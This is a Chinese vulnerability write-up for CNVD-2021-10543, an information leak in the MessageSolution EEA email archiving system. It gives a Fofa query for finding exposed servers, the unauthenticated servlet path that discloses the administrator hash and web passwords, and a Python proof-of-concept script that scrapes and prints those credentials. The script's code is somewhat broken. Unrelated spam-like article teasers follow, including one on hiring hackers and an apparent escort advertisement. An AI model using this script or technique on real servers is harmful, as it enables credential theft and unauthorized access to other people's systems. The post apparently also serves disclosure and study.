(CNVD-2021-10543)|MessageSolution 企业邮件归档管理系统 EEA 存...
0x01 漏洞说明
MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码。
0x02?影响版本
MessageSolution Enterprise Email Archiving (EEA)
0x03?漏洞复现
Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)
MessageSolution企业邮件归档管理系统首页为这样:
访问URL查看泄漏的hash和web账号密码:
http://xxx.xxx.xxx/authenticationserverservlet/
获取到账号、密码后即可访问url进行登录:
https://xxx.xxx.xxx.xxx/indexcommon.jsp
脚本POC:
# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"
import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()
def title():
print("+-------------------------------------------------+")
print("+----------- CNVD-2021-10543 ----------------+")
print("+----------- MessageSolution信息泄漏 --------------+")
print('+--------- Fofa: title="MessageSolution" ---------+')
print("+-------- use: python3 CNVD-2021-10543.py -------+")
print("+-------------------------------------------------+")
def target_url(url):
target_url=url + "/authenticationserverservlet/"
login_url=url + "/indexcommon.jsp"
# verify=False 忽略SSL证书校验
try:
res=requests.get(url=target_url, verify=False,timeout=5)
if "administrator" in res.text and res.status_code==200:
print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
time.sleep(1)
print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
bs_xml=BeautifulSoup(res.text,features="html.parser")
user_names=bs_xml.findAll('username')
passwords=bs_xml.findAll('password')
i=1
print(f"[!] \033[31m获取到目标系统信息:\033[0m")
if i < len(user_names):
for user_name,password in user_names,passwords:
print(f" 用户名: {user_name.text} 密 码: {password.text}")
i=i+1
else:
print(f" 用户名: {user_names[0].text}
密 码: {passwords[0].text}")
print(f"\033[32m[0] 请访问: {login_url} 进行登录!")
else:
print(f"[0] \033[32m目标系统: {url} 不存在信息泄\033[0m")
except Exception as e:
print(f"[!] 目标系统: {url} 出现意外错误:
{e}")
if __name__=="__main__":
title()
url=str(input("[0] 请输入目标站点URL:
"))
target_url(url)
0x04?修复建议
厂商暂未给出修复建议?。
建议用户将该系统放置在内网,不要暴露在互联网,同时禁止未授权访问相关文件?。
结束语
本文章仅用于交流学习,请勿使用该漏洞进行违法活动。
https://github.com/Henry4E36/CNVD-2021-10543
相关文章
老重庆麻辣烫加盟收益如何?生意红火,收益不用说
许多想要创业的人都把本身的眼光放在了餐饮行业,确实,餐饮行业中埋没着浩瀚的商机。而鸡排加盟就是个中的一个。老重庆麻辣烫加盟作为市场中风行的一个品牌,方才出世就因为自身产物的鲜味和品牌特色吸引到一众的消...
淘宝上怎么找接单的黑客,找黑客抢黄金电影,发现黑客修改登录密码怎么办
在这篇文章中,我将叙述我在某个网络运用中所找到的逻辑缝隙,它存在于“找回暗码”这个功用中,能够让我接收恣意用户的帐号。 尽管最终进行进犯的方法是经过垂钓手法,但这个缝隙仍然有满足的要挟。 以下我将方针...
理疗是什么意思(理疗包括哪些项目)
当人们上了岁数,机体难以避免的是老化现象,最直接的表现就是骨头“脆”了,当出现骨科病后,医生往往建议的是康复理疗。那么理疗具体包括哪些呢?人人都适合做理疗吗? 理疗,古已有之 理疗的发展有着悠久的...
天津商务兼职app 包含女个人资料和类型价格魏易梦
天津商务兼职app 包含女学妹个人资料和类型价格【魏易梦】,上海是一座成功人士的聚集地,对商业模特的需求也是比较大的,今天明星商务分享模特访梦,年龄福州 女 30,婚姻:未婚,学历:高中,气质:天津商...
epc灯亮是什么故障(爱车的EPC指示灯亮起)
EPC=ElectronicPowerControl(发动机电子稳定系统)很多人把它称为电子稳定控制。EPC指示灯在大众品牌的车辆上比较常见,该系统由传感器和控制器等米件组成。当某一个传感器出现了故障...
网络主播怎么赚钱?你知道网络主播到底怎么赚钱吗
互联网发展到今天,看直播成了很多人的生活、学习和娱乐方式。网络主播是一种不错的副业赚钱方式,甚至诞生了一批专职播主,做的好的主播甚至比一些明星还要赚得多。懂懂今天给大家分享一些网络主播的赚钱之道。...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!